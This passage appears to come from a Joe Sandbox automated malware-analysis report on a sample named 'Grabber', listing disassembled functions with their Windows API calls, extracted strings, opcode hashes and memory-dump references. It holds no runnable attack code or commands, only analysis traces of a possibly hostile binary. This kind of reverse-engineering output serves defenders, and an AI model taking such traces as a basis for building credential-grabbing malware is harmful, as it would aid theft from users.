                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040D2E1
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409B36
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DestroyHeap
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                                                                                                                                                                                                                            • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                            • Part of subcall function 00409C80: memcpy.MSVCRT(?,00000000,00000000,?,?,00402705,02199F70,02199F70,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000), ref: 00409C90
                                                                                                                                                                                                                          • FreeResource.KERNEL32(?,02199F70,02199F70,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                                                                                                                                                                                                            • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                                                                                                                                                                                                            • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00408FB2
                                                                                                                                                                                                                          • LoadIconW.USER32 ref: 00408FE9
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                                                                                                                                                                                                          • RegisterClassExW.USER32 ref: 00409021
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00409048
                                                                                                                                                                                                                          • EnableWindow.USER32(00000000), ref: 00409059
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 00409091
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                                                                                                                                                                                                          • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409189
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409191
                                                                                                                                                                                                                          • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                                                                                                                                                                                                          • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                                                                                                                                                                                                          • BringWindowToTop.USER32(00000000), ref: 00409226
                                                                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00409259
                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00409264
                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409289
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004092A1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                                                                                                                                                                                          • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                                                                                                                                                                                                          • API String ID: 54849019-2968808370
                                                                                                                                                                                                                          • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                                                                                                                                                                                                          • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
                                                                                                                                                                                                                            • Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                                                                                                                                                                            • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                            • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                                                                                                                                                                                                                            • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                                                                                                                                                                                                                            • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                                                                                                                                                                                                          • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                                                                                                                                                                                                                          • API String ID: 1295435411-3159487945
                                                                                                                                                                                                                          • Opcode ID: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                                                                                                                                                                                                          • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00409373
                                                                                                                                                                                                                            • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409381
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 004093DD
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004093F1
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409481
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                                                                                                                                                                                                          • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                                                                                                                                          • API String ID: 4193992262-92458654
                                                                                                                                                                                                                          • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                                                                                                                                                                                                          • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 00406405
                                                                                                                                                                                                                            • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                                                                                                                                                                                                                          • _wcsdup.MSVCRT ref: 0040644E
                                                                                                                                                                                                                          • _wcsdup.MSVCRT ref: 00406469
                                                                                                                                                                                                                          • _wcsdup.MSVCRT ref: 0040648C
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 00406578
                                                                                                                                                                                                                          • free.MSVCRT ref: 004065DC
                                                                                                                                                                                                                          • free.MSVCRT ref: 004065EF
                                                                                                                                                                                                                          • free.MSVCRT ref: 00406602
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 0040662E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsdupfreewcsncpy$Value
                                                                                                                                                                                                                          • String ID: $0A$$0A$$0A
                                                                                                                                                                                                                          • API String ID: 1554701960-360074770
                                                                                                                                                                                                                          • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                                                                                                                                                                                                          • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                            • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02190000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A89B
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A8A6
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8AC
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,00000000,00000000,?,02199F70,00000000,00000000), ref: 0040A8BA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A8D9
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8DF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                                                                                                                                                                                          • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                                                                                                                                          • API String ID: 1740785346-287042676
                                                                                                                                                                                                                          • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                                                                                                                                                                                                          • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00412117
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                                                                                                                                                                                                                          • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 298514914-0
                                                                                                                                                                                                                          • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                                                                                                                                                                                                          • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
